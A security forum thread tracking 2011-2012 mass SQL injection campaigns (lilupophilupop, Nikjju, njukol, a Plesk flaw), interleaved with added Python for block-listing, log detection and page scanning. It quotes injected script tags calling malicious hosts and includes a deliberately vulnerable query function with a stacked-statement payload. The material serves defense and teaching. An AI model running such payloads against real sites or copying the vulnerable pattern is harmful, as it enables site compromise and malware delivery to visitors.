
Thread: SQL injection attacks...

  1. #1 AplusWebMaster (Adviser Team)
     Join Date: Oct 2005
     Location: USA
     Posts: 6,881

    Exclamation SQL injection attacks...

    FYI...

    Urgent Block: lilupophilupop-dot-com (SQL Injection)
    - http://www.malwaredomains.com/wordpress/?p=2213
    December 2nd, 2011 - "(The ISC*) is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL. We will block that domain on the next update but you shouldn’t wait…"
    * https://isc.sans.edu/diary.html?storyid=12127
    Last Updated: 2011-12-02 11:24:01 UTC - "... discovered yesterday about 80 sites showed in Google... and a few minutes ago 4000+. Targets include ASP sites and Coldfusion... The attack seems to work on all versions of MSSQL..."
    ___

    Diagnostic page for AS:48691 (SPECIALIST)
    - http://google.com/safebrowsing/diagnostic?site=AS:48691
    "... The last time Google tested a site on this network was on 2011-12-10, and the last time suspicious content was found was on 2011-12-10... Over the past 90 days, we found 15 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of 189 other site(s)... We found 30 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected 1504 other site(s)..."

    - http://blog.dynamoo.com/2010/10/evil...pecialist.html
    11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
    inetnum: 194.28.112.0 - 194.28.115.255
    netname: Specialist-ISP-PI2
    descr: Specialist, Ltd.
    Country: MD (Moldova)

    - https://blogs.msdn.com/themes/blogs/...006&GroupKeys=
    "... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

    Last edited by AplusWebMaster; 2011-12-11 at 01:53.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...

  2. #2 AplusWebMaster (Adviser Team)

    Exclamation Significant SQLi inroads/growth continue... status update

    FYI... Significant SQLi inroads/growth continue... status update:

    RE: https://isc.sans.edu/diary.html?storyid=12127
    UPDATE 8/12/2011 - "... number of sites infected is about 160,000 sites..."

    Updated 2011-12-29: Diagnostic page for AS:48691 (SPECIALIST)
    - http://google.com/safebrowsing/diagnostic?site=AS:48691
    "... The last time Google tested a site on this network was on 2011-12-29, and the last time suspicious content was found was on 2011-12-29... Over the past 90 days, we found 124 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 507 other site(s)... We found 300 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5064 other site(s)..."
    ___

    - http://blog.dynamoo.com/2011/12/evil...alist-ltd.html
    12 December 2011 - "... the number of malicious sites has dropped, but there is still not a legitimate site in sight... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255) if you can, because this range of IP addresses is nothing but trouble..."

    - https://blogs.msdn.com/themes/blogs/...006&GroupKeys=
    "... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."

    i.e.: https://zeustracker.abuse.ch/blocklist.php
    "... some ZeuS hosts are just hosted on an ip address and not on a domain..."

    Last edited by AplusWebMaster; 2011-12-29 at 12:32.
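Both posts above quote the MSDN note that a domain-name list does nothing against malware that calls a raw IP address, and dynamoo's advice to block the whole 194.28.112.0/22 range. The Python below is an added example, not code from this thread, from malwaredomains.com, the ISC or dynamoo, of a block-list check that takes a domain list and a WHOIS inetnum range together. The indicator values are the ones quoted in the posts; the targets it checks at the bottom are made up.

```python
"""Block-list check that combines a domain list with address ranges.

Added example, not code from the thread, malwaredomains.com or the ISC.
The indicator values (lilupophilupop.com, sweepstakesandcontestsinfo.com,
the 194.28.112.0 - 194.28.115.255 inetnum) are the ones quoted in the
posts; the targets checked under __main__ are constructed.
"""
import ipaddress
import re
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"lilupophilupop.com", "sweepstakesandcontestsinfo.com"}
WHOIS_INETNUM = "inetnum: 194.28.112.0 - 194.28.115.255"   # as quoted above


def inetnum_to_networks(line):
    """Convert a WHOIS 'inetnum: first - last' line into the minimal CIDR
    list, which is what a firewall or proxy ACL actually takes."""
    m = re.search(r"(\d+\.\d+\.\d+\.\d+)\s*-\s*(\d+\.\d+\.\d+\.\d+)", line)
    if not m:
        raise ValueError("no address range in %r" % line)
    first, last = (ipaddress.IPv4Address(g) for g in m.groups())
    return list(ipaddress.summarize_address_range(first, last))


BLOCKED_NETWORKS = inetnum_to_networks(WHOIS_INETNUM)    # [194.28.112.0/22]


def _host_of(target):
    """Host part of a URL, or the target itself if it is a bare host/IP."""
    if "://" not in target:
        target = "//" + target
    return (urlsplit(target).hostname or "").lower()


def domain_blocked(host):
    """True if host is a blocked domain or a subdomain of one."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in BLOCKED_DOMAINS for i in range(len(labels)))


def ip_blocked(host):
    """True if host is an address literal inside a blocked range.  Names
    return False here: a domain list never sees a direct-to-IP connection."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in BLOCKED_NETWORKS)


def is_blocked(target):
    """(blocked, reason): the domain list first, then the address ranges."""
    host = _host_of(target)
    if domain_blocked(host):
        return True, "domain list"
    if ip_blocked(host):
        return True, "network range"
    return False, ""


if __name__ == "__main__":
    for t in ("http://lilupophilupop.com/sl.php", "cdn.lilupophilupop.com",
              "http://194.28.113.7/x.js", "194.28.116.1", "example.com"):
        print(t, is_blocked(t))
```

The first two targets are caught by the domain list alone; the third is the case the MSDN note warns about and is only caught because the inetnum range was turned into a CIDR and checked separately. Matching parent domains by suffix also covers the throwaway subdomains these campaigns rotate through without listing each one.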

  3. #3 AplusWebMaster (Adviser Team)

    Exclamation Ouch - Lilupophilupop tops 1 million...

    FYI...

    - http://blog.imperva.com/2012/01/sql-injection.html
    January 05, 2012
    ___

    Lilupophilupop tops 1 million infected pages
    - https://isc.sans.edu/diary.html?storyid=12304
    Last Updated: 2011-12-31 07:33:00 UTC - "... SQL injection attacks... about 1,070,000 in fact... to give you a rough idea of where the pages are:
    UK - 56,300, NL - 123,000, DE - 49,700, FR - 68,100, DK - 31,000, CN - 505, CA - 16,600, COM - 30,500, RU - 32,000, JP - 23,200, ORG - 2,690..."

    Updated: 2012-01-05: Diagnostic page for AS48691 (SPECIALIST)
    - http://google.com/safebrowsing/diagnostic?site=AS:48691
    "... The last time Google tested a site on this network was on 2012-01-05, and the last time suspicious content was found was on 2012-01-05... Over the past 90 days, we found 148 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that appeared to function as intermediaries for the infection of 591 other site(s)... We found 452 site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com... that infected 5522 other site(s)..."

    - http://blog.dynamoo.com/2011/12/evil...alist-ltd.html
    12 December 2011 - "... No UN members recognise Transnistria*, and effectively it sits beyond the reach of international law enforcement... you should -block- access to 194.28.112.0/22 (194.28.112.0 - 194.28.115.255)..."

    * https://en.wikipedia.org/wiki/Transn...onal_relations
    ___

    - http://www.malwaredomains.com/wordpress/?p=2338
    January 3rd, 2012

    - http://centralops.net/co/DomainDossier.aspx
    ... Information related to '194.28.112.0 - 194.28.115.255'...
    netname: Specialist-ISP-PI2
    descr: Specialist, Ltd.
    country: MD ...
    route: 194.28.112.0/22
    origin: AS48691 ...

    Last edited by AplusWebMaster; 2012-01-06 at 15:31.

  4. #4 AplusWebMaster (Adviser Team)

    Thumbs down Injection code masquerades as Google Analytics

    FYI...

    Injection code masquerades as Google Analytics
    - http://community.websense.com/blogs/...analytics.aspx
    7 Feb 2012 - "Websense... has discovered a new wave of injection of malicious code disguising itself as Google Analytics, by adopting similar code snippets and malicious domains... We found other similar domains like google-analytics[dot]su in this attack... it is highly obfuscated, hard to understand, but after all tricks it finally will -redirect- to IP address 37.59.74.145 which hosts Black Hole Exploit..."
    (More detail at the websense URL above.)


  5. #5 AplusWebMaster (Adviser Team)

    Exclamation Plesk exploit - admin software actively exploited

    FYI...

    Plesk admin software actively exploited...
    - http://h-online.com/-1446587
    1 March 2012 - "A critical security vulnerability in the Plesk administration program is currently being actively used to compromise affected servers. Plesk is used most often by hosting providers and provides a web front-end for administering rented servers. The vulnerability seems to be an SQL injection problem, which an attacker can exploit to gain full administrative access to a system. Linux and Windows versions of Parallels Plesk Panel 7.6.1 - 10.3.1 are affected. Parallels, the company that publishes the software, has already fixed the vulnerability in the current versions and is even offering micro-updates whose only purpose is to fix the problem. Administrators should check the status of their Plesk version* immediately."
    * http://kb.parallels.com/en/9294

    Security advisory from Parallels: http://kb.parallels.com/en/113321

    Last edited by AplusWebMaster; 2012-03-01 at 22:51.

  6. #6 AplusWebMaster (Adviser Team)

    Thumbs down Mass SQL injection campaign - 180k+ pages compromised

    FYI...

    Mass SQL injection campaign (180k+ pages compromised)
    - http://blog.sucuri.net/2012/04/nikjj...mpromised.html
    April 17, 2012 - "... tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them. Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:
    <script src= http ://nikjju .com/r.php ></script>
    This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu .de .lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection... So far Google has identified 188,000 pages infected with that javascript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon... The domain Nikjju .com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th)... If you suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner*). You will also need to audit your code to make sure that any user input is sanitized before use...
    We are seeing a few small .gov sites compromised as well (mostly from China):
    jnd .xmchengdu .gov .cn
    study .dyny .gov .cn
    cnll .gov .cn
    bj .hzjcy .gov .cn
    mirpurkhas .gov .pk
    tdnyw .gov .cn
    gcjs .kaifeng .gov .cn ..."

    * http://sitecheck.sucuri.net/scanner/

    Urgent Block: nikjju .com and best-antiviruu .de .lv
    - http://www.malwaredomains.com/wordpress/?p=2606
    April 17th, 2012

    Nikjju Mass injection campaign (150k+ sites compromised)
    > http://atlas.arbor.net/briefs/
    Severity: Elevated Severity
    Published: Thursday, April 19, 2012 15:40
    Another mass SQL injection campaign is underway, affecting vulnerable ASP and ASP.NET sites.
    Analysis: While SQL injection vulnerabilities have been known for years, they continue to cause problems ranging from mass injection attacks used to install malware on vulnerable site visitors to more serious attacks that exfiltrate sensitive data for personal, political or financial means. Attackers can also leverage a SQL injection issue to penetrate deeper into a network and move laterally, compromising targeted resources along the way. Code review and proper web application security assessment can help detect such bugs before criminals use them for malicious ends...

    Last edited by AplusWebMaster; 2012-04-24 at 02:01.
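Sucuri's advice in the post above is to audit the code so that user input is sanitised before use. The Python below is an added example, not code from this thread or from Sucuri, of the two halves of that audit: the concatenated query shape that lets a stacked statement append a script tag to every stored row (the effect these campaigns had on ASP sites backed by MSSQL), and the parameterised query that makes the same payload inert. sqlite3 is a stand-in for MSSQL here and refuses stacked statements on its own, so a small helper splits and runs them in turn to imitate a driver that does not; that helper, the table, its rows and the host example.invalid are all constructed for the demonstration.

```python
"""Stacked-statement SQL injection of the kind behind the Nikjju and
Lizamoon mass injections, beside the parameterised query that stops it.

Added example, not code from the thread or from Sucuri.  The campaigns
hit classic ASP pages on MSSQL, where a concatenated query string goes to
a driver that executes several statements at once; sqlite3.execute refuses
stacked statements, so _stacked_execute below splits and runs them in
turn to stand in for such a driver (an assumption for the demonstration).
The table, its rows and the script host example.invalid are constructed.
"""
import sqlite3

INJECTED_TAG = "<script src=http://example.invalid/r.php></script>"
# What arrives in ?id= : a valid id, then a statement that appends the tag
# to every row.  The real payloads did the same over every text column
# found via the system catalog, hex-encoded inside CAST(0x... AS VARCHAR).
PAYLOAD = "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Fresh in-memory content table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO articles VALUES (1, 'Hello', '<p>first</p>');"
        "INSERT INTO articles VALUES (2, 'World', '<p>second</p>');"
    )
    return con


def _stacked_execute(con, sql):
    """Stand-in for a driver that runs every ';'-separated statement and
    returns the rows of the SELECT.  Naive split; enough for this payload."""
    rows = []
    for stmt in (s.strip() for s in sql.split(";")):
        if not stmt:
            continue
        cur = con.execute(stmt)
        if cur.description:        # only a SELECT carries column metadata
            rows = cur.fetchall()
    con.commit()
    return rows


def get_article_vulnerable(con, article_id):
    """Request.QueryString("id") pasted into the SQL text: the id is parsed
    as SQL, so a ';' ends the SELECT and whatever follows runs as well."""
    sql = "SELECT title, body FROM articles WHERE id = " + str(article_id)
    return _stacked_execute(con, sql)


def get_article_safe(con, article_id):
    """Parameterised lookup: the value travels separately from the SQL text
    and is compared as data, never parsed.  The same payload now matches
    no row.  Checking that id is an integer at the edge is a cheap extra
    layer, but the parameter is what removes the injection."""
    row = con.execute("SELECT title, body FROM articles WHERE id = ?",
                      (article_id,)).fetchone()
    return row


def infected_rows(con):
    """How many bodies now carry a <script tag (what a site scanner sees)."""
    return con.execute(
        "SELECT count(*) FROM articles WHERE body LIKE '%<script%'").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(get_article_vulnerable(db, "1"), infected_rows(db))   # rows, 0
    get_article_vulnerable(db, PAYLOAD)
    print(infected_rows(db))                                    # 2
    db = make_db()
    print(get_article_safe(db, PAYLOAD), infected_rows(db))     # None 0
```

The vulnerable path still returns the right article for the honest request, which is why these pages passed testing; the damage only shows up in the stored content, and from there on every visitor is served the tag. Escaping quotes would not have helped here either, because the payload is numeric context with no quote to escape; the parameter is the fix.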

  7. #7 AplusWebMaster (Adviser Team)

    Thumbs down Nikjju SQL injection update - now hgbyju .com/r.php

    FYI...

    Nikjju SQL injection update (now hgbyju .com/r.php)
    - http://blog.sucuri.net/2012/04/nikjj...-comr-php.html
    April 22, 2012 - "We posted a few days ago about a Mass SQL injection campaign* that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju .com malware. However, for the last two days, the attackers switched domain names and are now using hgbyju .com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:
    <script src = http ://hgbyju .com/r.php <</script> ..."
    * http://blog.sucuri.net/2012/04/nikjj...mpromised.html
    April 17, 2012
    ___

    - https://isc.sans.edu/diary.html?storyid=13036
    Last Updated: 2012-04-24 00:17:18 UTC - "... resulting fake/rogue AV campaigns they subject victims to..."

    - http://google.com/safebrowsing/diagn...ite=nikjju.com
    "... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
    - http://google.com/safebrowsing/diagn...ite=hgbyju.com
    "... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
    - http://google.com/safebrowsing/diagnostic?site=AS:42926
    "... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."

    Last edited by AplusWebMaster; 2012-04-24 at 18:35.

  8. #8 AplusWebMaster (Adviser Team)

    Lightbulb Automated Attacks - SQL injection and RFI/LFI attacks

    FYI...

    - http://blog.spiderlabs.com/2012/05/m...-analysis.html
    01 May 2012
    > https://www.owasp.org/index.php/SQL_...on_Cheat_Sheet
    ___

    Automated Attacks - SQL injection and RFI/LFI attacks
    - http://blog.imperva.com/2012/04/automated-attacks.html
    April 25, 2012 - "... cloud-security provider Incapsula published a study* showing that 31 percent of website traffic was -malicious- traffic... interesting is the speed and effectiveness of the hacks. How was it achieved? Automation. Automated hacks are not new. However, recently, we have noticed increased sophistication... this month’s Imperva’s latest Hacker Intelligence Initiative report** is to give a "state of the union" when it comes to automated attacks. Specifically, we describe the key tools and processes hackers use to automate SQL injection and RFI/LFI attacks. We believe these are the two most deployed attack methods and, as in any industry—automation, is a key indicator that someone wishes to achieve an economy of scale. Further, the automated tools being developed are sophisticated. This means:
    • The script kiddies are hitting puberty. In other words, their attacks will be more effective and thorough.
    • The pool of hackers is likely to increase. The ease of use of these tools is a key component of their appeal... hacking tools is a cottage industry trying to appeal to those hoping for a few online thrills.
    Our report can be downloaded here**. The report details:
    • Commonly used automated SQL injection and RFI/LFI tools.
    • How to identify them when they hit your website.
    • Some strategies needed to stop them."

    * http://www.incapsula.com/the-incapsu...-your-business

    ** http://www.imperva.com/download.asp?id=360
    PDF file - 12 pgs. - "... Summary and Conclusions: With automation, the odds of cyber attack are close to 100%. How can security teams prepare and stop malicious, automated site traffic in order to:
    › Block attacks early and efficiently.
    › Defend against 0 days.
    › To save analysis resources by clustering all attack vectors related to the same attack to a single group. Detecting automation requires abilities greater than plain signatures. Moreover, detecting bad automation must also allow non-malicious automation...
    Contending with automated attacks requires:
    › Rate-based detection mechanism: Automated tools often interact with sites at inhuman speeds. Signatures, however, are usually confined to a single event. The ability to detect inhuman interactions is a key step.
    › Missing or unique headers: Signatures are good at detecting existing patterns, not at detecting missing pieces. Automated tools often lack headers, divulging their ulterior intentions. But malicious automation can be distinguished by its use of unique headers or payloads.
    › Identify by using the experience of others (reputation): Automated attack sources tend to attack many targets."

    Last edited by AplusWebMaster; 2012-05-01 at 22:53.
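The Imperva summary quoted above names three signals that plain signatures miss: inhuman request rate, missing or tool-specific headers, and source reputation. The Python below is an added example, not code from this thread or from Imperva's report, that runs those three checks over a web server log and adds a fourth for the DECLARE/CAST(0x payload shape the campaigns in this thread used. The log lines (combined format, TEST-NET addresses), the reputation set, the tool user-agent markers and the thresholds are all constructed assumptions for the demonstration.

```python
"""Flags automated attack traffic in a web server log with the signals the
Imperva report names (inhuman rate, missing or tool-specific headers,
source reputation) plus the SQL payload signature the mass injection
campaigns leave in query strings.

Added example, not code from the thread or from Imperva.  The log lines
(combined format, TEST-NET addresses), the reputation set, the tool
user-agent markers and the thresholds are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# DECLARE @S / CAST(0x..) / EXEC( is the hex-wrapped shape the 2011-2012
# campaigns used; UNION SELECT covers ordinary data-extraction probes.
SQLI_RE = re.compile(r"declare\s+@|cast\s*\(\s*0x|exec\s*\(|union\s+select", re.I)
TOOL_UA = ("sqlmap", "havij", "python-urllib", "libwww-perl")   # assumption
BAD_SOURCES = {"192.0.2.77"}                                   # constructed
RATE_LIMIT, WINDOW_SECONDS = 5, 10      # >5 requests in any 10 s: inhuman

SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2012:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120 "-" "-"
203.0.113.5 - - [25/Apr/2012:10:00:01 +0000] "GET /news.asp?id=12' HTTP/1.1" 500 221 "-" "-"
203.0.113.5 - - [25/Apr/2012:10:00:02 +0000] "GET /news.asp?id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53 AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 5120 "-" "-"
203.0.113.5 - - [25/Apr/2012:10:00:02 +0000] "GET /list.asp?cat=3;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 3310 "-" "-"
203.0.113.5 - - [25/Apr/2012:10:00:03 +0000] "GET /item.asp?n=9;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 2048 "-" "-"
203.0.113.5 - - [25/Apr/2012:10:00:03 +0000] "GET /item.asp?n=10 HTTP/1.1" 200 2048 "-" "-"
198.51.100.9 - - [25/Apr/2012:10:00:05 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120 "http://example.invalid/" "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
198.51.100.9 - - [25/Apr/2012:10:00:35 +0000] "GET /item.asp?n=9 HTTP/1.1" 200 2048 "http://example.invalid/news.asp?id=12" "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
192.0.2.77 - - [25/Apr/2012:10:01:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
"""


def parse(log_text):
    """Yield one record per well-formed line; anything else is skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["req"] = unquote(rec["req"])   # match on the decoded request
        yield rec


def burst(times):
    """True if more than RATE_LIMIT requests fall in any WINDOW_SECONDS span."""
    times = sorted(times)
    j = 0
    for i in range(len(times)):
        while j < len(times) and (times[j] - times[i]).total_seconds() <= WINDOW_SECONDS:
            j += 1
        if j - i > RATE_LIMIT:
            return True
    return False


def analyse(log_text):
    """Map each source address to the sorted list of signals it tripped."""
    per_ip = defaultdict(list)
    for rec in parse(log_text):
        per_ip[rec["ip"]].append(rec)
    verdicts = {}
    for ip, recs in per_ip.items():
        reasons = set()
        if burst([r["when"] for r in recs]):
            reasons.add("rate")
        for r in recs:
            ua = r["ua"].lower()
            if ua in ("", "-"):
                reasons.add("missing-user-agent")
            elif any(tool in ua for tool in TOOL_UA):
                reasons.add("tool-user-agent")
            if SQLI_RE.search(r["req"]):
                reasons.add("sqli-payload")
        if ip in BAD_SOURCES:
            reasons.add("reputation")
        verdicts[ip] = sorted(reasons)
    return verdicts


if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, reasons or "clean")
```

Two details matter in practice. The request is URL-decoded before the signature runs, because a percent-encoded DECLARE slips past a pattern applied to the raw line; and the signature looks for the CAST(0x wrapper rather than the SQL inside it, since the inner statement is hex and never appears in clear. The rate check is per source over a sliding window, so a single probe from a known-bad address still gets flagged on reputation alone, which is the point of the third signal.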

  9. #9 AplusWebMaster (Adviser Team)

    Unhappy Malware Analysis - compromised sites April 2012...

    FYI...

    Malware Analysis - compromised sites April 2012
    - http://blog.sucuri.net/2012/05/april...-analysis.html
    May 1, 2012 - "When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:
    1. Iframe injection: It makes the browser load content from external (and malicious) web sites...
    2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes...
    3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
    4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra online store).
    - April / 2012 stats
    Last month, we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:
    • Iframe injection: 52.6%
    • Javascript injection: 26.5%
    • Blackhat SEO spam: 10.1%
    • .htaccess redirections: 7.3%
    • Other: 3% ..."
    (More detail at the sucuri URL above.)

    Last edited by AplusWebMaster; 2012-05-02 at 17:18.
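Posts #6 and #7 give the exact shape of the injected script tag (including the malformed hgbyju variant), and the post above sorts compromised sites into iframe injection, javascript injection and .htaccess redirection. The Python below is an added example, not Sucuri's scanner or any code from this thread, that classifies a page's off-site includes into those categories and flags the conditional RewriteCond/RewriteRule pattern in an .htaccess file. Blackhat SEO spam is left out, since it needs content analysis rather than tag matching. The IOC hosts are the ones quoted in the thread; the sample page, the site name www.example-site.test, the 203.0.113.9 address and the .htaccess fragment are constructed.

```python
"""Classifies the injection artefacts the Sucuri posts describe: external
script includes (the nikjju / hgbyju / lilupophilupop tags), hidden
iframes, and .htaccess rules that redirect only search-engine visitors.

Added example, not code from the thread or from Sucuri.  IOC hosts are the
ones quoted in the posts; the sample page, www.example-site.test, the
203.0.113.9 address and the .htaccess fragment are constructed.
"""
import re
from urllib.parse import urlsplit

IOC_HOSTS = {"nikjju.com", "hgbyju.com", "lilupophilupop.com"}

# Deliberately tolerant: injected tags are often malformed, e.g.
# <script src = http://hgbyju.com/r.php <</script>  (no quotes, no '>').
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?\s*(?P<url>[^\s"'<>]+)""", re.I)
IFRAME = re.compile(r"<iframe\b(?P<attrs>[^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
SCRIPT_IN_TITLE = re.compile(r"<title>[^<]*<script", re.I)
REWRITE_COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+\S+", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(?P<target>https?://\S+)", re.I)


def _external_host(url, site_host):
    """Host of url when it is not the site itself, else None (relative/own)."""
    host = (urlsplit(url).hostname or "").lower()
    return host if host and host != site_host.lower() else None


def _attrs(raw):
    return {k.lower(): v.strip("\"'").lower() for k, v in ATTR.findall(raw)}


def _is_hidden(a):
    tiny = {"0", "1", "0px", "1px"}
    style = a.get("style", "").replace(" ", "")
    return (a.get("width") in tiny and a.get("height") in tiny
            or "display:none" in style or "visibility:hidden" in style)


def scan_html(html, site_host):
    """Sorted (kind, host, known_ioc) triples for off-site includes."""
    found = set()
    for m in SCRIPT_SRC.finditer(html):
        host = _external_host(m.group("url"), site_host)
        if host:
            found.add(("script", host, host in IOC_HOSTS))
    for m in IFRAME.finditer(html):
        a = _attrs(m.group("attrs"))
        host = _external_host(a.get("src", ""), site_host)
        if host:
            kind = "hidden-iframe" if _is_hidden(a) else "iframe"
            found.add((kind, host, host in IOC_HOSTS))
    if SCRIPT_IN_TITLE.search(html):
        # A tag inside <title> was appended to a stored text column: the
        # fingerprint of a mass SQL injection rather than an edited file.
        found.add(("script-in-title", "", False))
    return sorted(found)


def scan_htaccess(text, site_host):
    """RewriteRules that send visitors off-site only when the referer or
    user agent matched a preceding RewriteCond.  An absolute URL target is
    a redirect in Apache even without [R]."""
    found, conds = [], []
    for line in text.splitlines():
        if REWRITE_COND.match(line):
            conds.append(line.strip())
            continue
        m = REWRITE_RULE.match(line)
        if m:
            host = _external_host(m.group("target"), site_host)
            if host and conds:
                found.append(("conditional-redirect", host, host in IOC_HOSTS))
            conds = []          # RewriteCond lines bind only to the next rule
    return found


SAMPLE_HTML = """<html><head>
<title>News<script src=http://nikjju.com/r.php></script></title>
<script src="/js/app.js"></script>
</head><body><p>Story text</p>
<script src = http://hgbyju.com/r.php <</script>
<iframe src="http://203.0.113.9/in.php" width="0" height="0"></iframe>
<iframe src="https://www.example-site.test/embed/1" width="400" height="300"></iframe>
</body></html>"""

SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(google|bing|yahoo).* [NC]
RewriteRule ^.*$ http://203.0.113.9/go.php [L]
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "www.example-site.test"):
        print("page:", f)
    for f in scan_htaccess(SAMPLE_HTACCESS, "www.example-site.test"):
        print(".htaccess:", f)
```

The script-in-title check is the one worth keeping even after the IOC hosts rotate: a file edit puts the tag where a tag belongs, while a database-wide UPDATE puts it inside titles, alt text and other stored strings, which is how the Nikjju and Lilupophilupop pages looked in search results. The .htaccess check only fires when a referer or user-agent condition precedes the off-site rule, which is exactly the case an ordinary visit from a bookmark never triggers.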

  10. #10 AplusWebMaster (Adviser Team)

    Thumbs down Another SQL-i attack - njukol-dot–com...

    FYI...

    Another SQL-i attack - njukol-dot–com ...
    - https://www.f-secure.com/weblog/archives/00002357.html
    May 3, 2012 - "... the name is no longer as catchy as Lizamoon, the idea remains the same. This njukol .com is still pretty fresh out of the oven. The domain was registered last April 28*... the registrant of the domain is still the same with all those previous ones."
    * https://www.f-secure.com/weblog/archives/registrant.png

    - http://www.malwaredomains.com/wordpress/?p=2644
    April 29th, 2012 - "... add this to your block or shun list."

